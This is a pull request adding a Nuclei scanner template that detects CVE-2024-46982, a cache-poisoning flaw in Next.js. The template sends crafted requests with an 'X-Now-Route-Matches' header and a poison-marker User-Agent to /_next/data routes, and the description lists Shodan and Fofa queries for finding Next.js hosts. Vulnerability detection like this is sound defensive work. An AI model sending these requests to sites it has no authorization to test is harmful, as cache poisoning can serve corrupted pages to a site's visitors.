### PR TITLE
Add CVE-2024-46982 - Next.js Cache Poisoning (Pages Router)

### DIFF
--- a/http/cves/2024/CVE-2024-46982.yaml
+++ b/http/cves/2024/CVE-2024-46982.yaml
@@ -35,12 +35,27 @@ info:
       - x-middleware-rewrite
   tags: cve,cve2024,nextjs,cache,poisoning
 
-flow: http(1) && http(2) && http(3)
+flow: http(1) || (http(2) && http(3) && http(4))
 
 variables:
   cache-buster: "{{rand_text_alpha(10)}}"
 
 http:
+  - raw:
+      - |
+        GET /dashboard HTTP/1.1
+        Host: {{Hostname}}
+        X-Now-Route-Matches: -1
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Cache-Control"
+          - "s-maxage=1"
+          - "stale-while-revalidate"
+        condition: and
+
   - method: GET
     path:
       - "{{BaseURL}}"
@@ -74,7 +89,6 @@ http:
         GET /_next/data/{{buildId}}{{routes}}.json?cb={{cache-buster}} HTTP/1.1
         Host: {{Hostname}}
         User-Agent: nuclei-cve-2024-46982-FIXED-POISON-MARKER
-        x-now-route-matches: 1
 
     max-redirects: 2
 
@@ -90,7 +104,6 @@ http:
       - |
         GET /_next/data/{{buildId}}{{routes}}.json?cb={{cache-buster}} HTTP/1.1
         Host: {{Hostname}}
-        x-now-route-matches: 1
 
     max-redirects: 2
 


### PR DESCRIPTION
/claim #13204 

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->

- Added CVE-2024-46982 - Next.js Cache Poisoning (Pages Router)
- References:
  - https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9
  - https://nvd.nist.gov/vuln/detail/CVE-2024-46982
  - https://github.com/Lercas/CVE-2024-46982
  - https://github.com/CodePontiff/next_js_poisoning

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```bash
nuclei -t http/cves/2024/CVE-2024-46982.yaml -u [hidden]/ -debug -v
```

#### Additional Details (leave it blank if not applicable)

- Debug logs sent to templates@projectdiscovery.io
- Verified against a vulnerable Next.js (13.5.3) instance 
- Control tested against a safe Next.js (14.3.0+) instance

Shodan / Fofa queries for hunting:
- `http.html:"Next.js"`
- `header:"x-powered-by: Next.js"`

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
